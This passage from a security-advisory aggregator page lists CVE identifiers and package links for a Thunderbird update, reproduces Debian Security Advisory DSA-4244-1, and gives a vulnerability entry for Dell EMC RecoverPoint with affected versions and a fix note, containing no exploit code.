  CVE-2018-12359, CVE-2018-12360, CVE-2018-12362, CVE-2018-12363,
  CVE-2018-12364, CVE-2018-12365, CVE-2018-12366, CVE-2018-12372,
  CVE-2018-12373, CVE-2018-12374, CVE-2018-5188

Package Information:
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.18.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.17.10.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.16.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:52.9.1+build3-0ubuntu0.14.04.1
    

- Vulnerability Information (F148553)

Debian Security Advisory 4244-1 (PacketStormID:F148553)
2018-07-14 00:00:00
Debian  debian.org
advisory,denial of service,arbitrary
linux,debian
CVE-2017-17689,CVE-2018-12359,CVE-2018-12360,CVE-2018-12362,CVE-2018-12363,CVE-2018-12364,CVE-2018-12365,CVE-2018-12366,CVE-2018-12372,CVE-2018-12373,CVE-2018-12374,CVE-2018-5188

Debian Linux Security Advisory 4244-1 - Multiple security issues have been found in Thunderbird, which may lead to the execution of arbitrary code, denial of service or attacks on encrypted emails.

-------------------------------------------------------------------------
Debian Security Advisory DSA-4244-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
July 13, 2018                         https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : thunderbird
CVE ID         : CVE-2017-17689 CVE-2018-5188 CVE-2018-12359 CVE-2018-12360 
                 CVE-2018-12362 CVE-2018-12363 CVE-2018-12364 CVE-2018-12365 
                 CVE-2018-12366 CVE-2018-12372 CVE-2018-12373 CVE-2018-12374

Multiple security issues have been found in Thunderbird, which may lead
to the execution of arbitrary code, denial of service or attacks on
encrypted emails.

For the stable distribution (stretch), these problems have been fixed in
version 1:52.9.1-1~deb9u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
    

- Vulnerability Information

Dell EMC RecoverPoint and RecoverPoint for Virtual Machines Multiple Security Vulnerabilities
Class: Design Error
Bugtraq ID: 104246
Remote: Yes
Local: No
Published: 2018-05-21 12:00:00
Updated: 2018-05-21 12:00:00
Credit: Paul Taylor (@bao7uo) / Foregenix Ltd.

- Affected Software Versions

EMC RecoverPoint for Virtual Machines 5.0
EMC RecoverPoint for Virtual Machines 4.3.1.4
EMC RecoverPoint for Virtual Machines 4.0
EMC RecoverPoint 5.0
EMC RecoverPoint 4.4.1.1
EMC RecoverPoint 4.4.1.0
Dell EMC RecoverPoint for Virtual Machines 5.1.1
Dell EMC RecoverPoint for Virtual Machines 5.1.1.2
Dell EMC RecoverPoint for Virtual Machines 5.1
Dell EMC RecoverPoint 5.1

- Unaffected Software Versions

Dell EMC RecoverPoint for Virtual Machines 5.1.1.3
Dell EMC RecoverPoint 5.1.2

- Vulnerability Discussion

Dell EMC RecoverPoint and RecoverPoint for Virtual Machines are prone to the following multiple security vulnerabilities:

1. A remote code-execution vulnerability
2. An arbitrary file-read vulnerability
3. Multiple information-disclosure vulnerabilities

An attacker can leverage these issues to execute arbitrary code, read arbitrary files, or gain sensitive information within the context of the affected system. Failed exploit attempts will likely result in denial of service conditions.

The following versions are vulnerable:

Versions prior to EMC RecoverPoint 5.1.2
Versions prior to EMC RecoverPoint for Virtual Machines 5.1.1.3

- Exploit

The researcher who discovered this issue has created a proof-of-concept for CVE-2018-1242. Please see the references for more information.

- Solution

Reportedly, these issues are fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
